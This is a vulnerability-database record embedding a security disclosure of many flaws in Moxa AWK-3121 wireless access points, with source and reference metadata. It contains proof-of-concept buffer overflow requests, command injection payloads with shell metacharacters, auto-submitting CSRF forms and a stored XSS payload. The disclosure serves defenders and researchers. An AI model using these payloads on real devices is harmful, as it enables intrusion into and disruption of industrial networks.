iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n However, the same functionality allows an attacker to execute commands\n on the device. The POST parameter \"srvName\" is susceptible to a buffer\n overflow. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. However, the same functionality allows\n an attacker to execute commands on the device. The POST parameters\n \"to1,to2,to3,to4\" are all susceptible to buffer overflow. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n However, the same functionality allows an attacker to execute commands\n on the device. The POST parameter \"srvName\" is susceptible to this\n injection. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. However, the same functionality allows an attacker\n to execute commands on the device. The POST parameter \"iw_privatePass\"\n is susceptible to this injection. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. It\n provides functionality so that an administrator can change the\n name of the device. However, the same functionality allows an attacker\n to execute XSS by injecting an XSS payload. The POST parameter\n \"iw_board_deviceName\" is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_filename\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_filename\" is susceptible to command\n injection via shell metacharacters. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_serverip\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "VULHUB",
"id": "VHN-120475"
},
{
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10690",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-318",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-23548",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120475",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10690",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "VULHUB",
"id": "VHN-120475"
},
{
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
]
},
"id": "VAR-201906-0780",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "VULHUB",
"id": "VHN-120475"
}
],
"trust": 0.06999999999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
}
]
},
"last_update_date": "2023-12-18T12:00:03.880000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-311",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120475"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "NVD",
"id": "CVE-2018-10690"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10690"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/311.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "VULHUB",
"id": "VHN-120475"
},
{
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "VULHUB",
"id": "VHN-120475"
},
{
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120475"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.230000",
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-120475"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"date": "2023-02-28T19:30:17.817000",
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Vulnerabilities related to certificate and password management in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
],
"trust": 0.6
}
}
VAR-201906-0792
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters. Moxa AWK-3121 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
